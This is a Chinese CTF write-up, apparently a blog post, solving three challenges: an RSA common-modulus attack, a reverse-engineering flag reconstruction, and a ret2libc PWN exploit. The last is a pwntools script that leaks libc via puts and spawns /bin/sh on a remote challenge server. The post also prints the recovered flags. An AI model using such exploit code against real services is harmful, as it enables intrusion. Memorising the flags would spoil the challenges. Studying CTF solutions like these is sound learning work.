zoukankan      html  css  js  c++  java
  • 巅峰极客线上第二场部分ctf

     一、RSA

    题目给出flag1.enc、flag2.enc、pubkey1.pem、pubkey1.pem四个文件

    使用以下指令提取pem文件中的n和e

    rsa -pubin -text -modulus -in pubkey1.pem

    rsa -pubin -text -modulus -in pubkey2.pem

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey1.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 2333 (0x91d)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICCR0=
    -----END PUBLIC KEY-----

    得到第一个
    e:2333
    n:0xModulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey2.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 23333 (0x5b25)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICWyU=
    -----END PUBLIC KEY-----

    得到第二个
    e:23333
    n:0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217

    共模攻击代码参考:http://www.freebuf.com/column/148898.html  (PS:此题还需对原两个enc文件进行base64解密)

    # -*- coding: utf-8 -*-
    
    from libnum import n2s,s2n
    from gmpy2 import invert
    import base64
    # 欧几里得算法
    def egcd(a, b):
        if a == 0:
            return (b, 0, 1)
        else:
            g, y, x = egcd(b % a, a)
            return (g, x - (b // a) * y, y)
    
    def main():
        n = 0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217 
        fo1 = open('flag1.enc','rb')
        fo2 = open('flag2.enc','rb')
    
        datafo1 = fo1.read()
        datafo2 = fo2.read()
    
        c1 = s2n(base64.b64decode(datafo1))
        c2 = s2n(base64.b64decode(datafo2))
    
        fo1.close()
        fo2.close()
    
        e1 = 2333 
        e2 = 23333
    
        s = egcd(e1, e2)
    
        s1 = s[1]
        s2 = s[2]
    
        # 求模反元素
        if s1<0:
            s1 = - s1
            c1 = invert(c1, n)
        elif s2<0:
            s2 = - s2
            c2 = invert(c2, n)
        m = pow(c1,s1,n)*pow(c2,s2,n) % n
        print(n2s(m))
    
    if __name__ == '__main__':
      main()

    得到flag:

    flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

    二、Antidbg

    IDA打开看到,在字符串窗口中看到pause

    转到对应汇编处,F5,positive sp value has been found。

    菜单栏 ==> Options ==> General ,把Stack Pointer勾上

    参考:https://blog.csdn.net/kendyhj9999/article/details/78175149

    在左侧出现负的sp的上一行处,按Alt + K,弹出一个窗口,在当前差异前加一个负号,单击确定。

    再次F5

    int __usercall sub_4011A0@<eax>(char a1@<sil>)
    {
      memset(input, 0, 0x32u);
      CoInitialize(0);
      CreateThread(0, 0, StartAddress, 0, 0, 0);
      sub_401050((const char *)&unk_402128, (unsigned int)input);
      if ( strlen(input) == 42 )
      {
        i = 0;
        v3 = xmmword_4021C0;
        v5 = 34080258;
        v4 = xmmword_4021B0;
        v6 = 33882121;
        v7 = 3330;
        while ( input[i] >> 4 == dword_403018[a[i]] && (input[i] & 0xF) == dword_402138[*((char *)&v3 + i)] )
        {
          if ( ++i >= 42 )
          {
            v9 = 1667462515;
            v10 = 7566181;
            goto LABEL_8;
          }
        }
        LOWORD(v10) = 114;
        v9 = 1869771365;
    LABEL_8:
        sub_401020(&v9, a1);
      }
      system("pause");
      return 0;
    }

    动态调试后dword_403018数组 402138数组的值:

                

     数组a:

    v3:

    根据反汇编出来的结果可以知道是通过a数组中的值索引到403018对应的值,这里面是一个字符的高4位,通过数组v3中的值索引到402138对应的值,这里面是一个字符的低4位。(这里刚好402138其对应值个其对应的索引相等,写脚本的时候就用不着把402138也列出来了)

    a = [
    0x02 ,0x02 ,0x02 ,0x02 ,0x03 ,0x01 ,0x01 ,0x02 , 
    0x01 ,0x01 ,0x02 ,0x01 ,0x01, 0x00 ,0x01 ,0x01 ,
    0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x01 ,0x01 ,0x00 ,
    0x01 ,0x01 ,0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x02 ,
    0x02 ,0x01 ,0x01 ,0x01 ,0x01 ,0x01 ,0x02 ,0x01 ,
    0x01 ,0x03]
    
    v_3018 = [2, 3, 6, 7]
    
    v3 = [
    0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02, 
    0x01, 0x06, 0x01, 0x07 ,0x02, 0x0D, 0x05, 0x01,
    0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D,
    0x08, 0x08, 0x01, 0x02, 0x0D, 0x07, 0x00, 0x01,
    0x02, 0x06, 0x08, 0x02, 0x09, 0x00, 0x05, 0x02,
    0x02, 0x0d]
    
    flag = ''
    for i in range(42):
        ch = v_3018[a[i]]<<4    
        ch = ch | v3[i]
        flag += chr(ch)
    
    print(flag)

    得到flag:

    flag{06b16a72-51cc-4310-88ab-70ab68290e22}

    三、PWN PlainR2B

     题目给了一个pwn和一个libc.so

    F5

    int game()
    {
      int result; // eax
      char buf; // [esp+Ch] [ebp-1Ch]
    
      puts("First, what's your name?");
      if ( read(0, &name, 0x14u) > 19 )
      {
        puts("Oh, your name too loooooong...");
        exit(0);
      }
      setbuf(stdin, 0);
      setbuf(stdout, 0);
      setbuf(stderr, 0);
      printf("%s, do you want to get flag?
    ", &name);
      read(0, &buf, 0x34u);
      if ( !strcmp(&buf, "yes") || (result = strcmp(&buf, "YES")) == 0 )
        result = printf("OK,the flag is flag{%s}, enmmm... but is true?", "WorkToWeekT_T");
      return result;
    }

    可以看到在read(0, &buf, 0x34u);处有栈溢出。

    覆盖到puts处泄露libc计算system,返回地址设为game,再次覆盖返回地址,覆盖成system。

    from pwn import *
    #p = process('./pwn')
    p = remote('117.50.60.184', 12345)
    elf = ELF('./pwn')
    libc = ELF('./libc-2.23.so')
    
    puts_libc = libc.symbols['puts']
    system_libc = libc.symbols['system']
    binsh_libc = libc.search('/bin/sh').next()
    game = elf.symbols['game']
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    
    payload = 'A'*0X1C + 'B'*4 + p32(puts_plt) + p32(game) + p32(puts_got) 
    
    p.recvuntil('name?')
    p.sendline('haha')
    p.recvuntil('flag?')
    p.sendline(payload)
    
    p.recv(1)
    puts_addr = u32(p.recv(4))
    system_addr = puts_addr - puts_libc + system_libc
    binsh_addr = puts_addr - puts_libc + binsh_libc
    
    payload1 = 'A'*0x1c + 'B'*4 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
    
    p.recvuntil('name?')
    p.sendline('Brian')
    p.recvuntil('flag?')
    p.sendline(payload1)
    
    p.interactive()
      
  • 相关阅读:
    [daily][dpdk] 内核模块(网卡驱动)无法卸载
    [development][tcp/ip][ids] 一个简单有参考价值的库 libnids
    [development][http][libhtp] suricata的http库--libhtp
    [skill][http] http管道化连接
    [skill][telnet] 用telnet获取一个网页
    [daily][grub2] grub2修改内核选项
    [knowledge] big data things
    [knowledge][dpdk] open data plane
    [daily] docker
    [knowledge] 停止等待协议
  • 原文地址:https://www.cnblogs.com/ha2ha2/p/9578106.html
Copyright © 2011-2022 走看看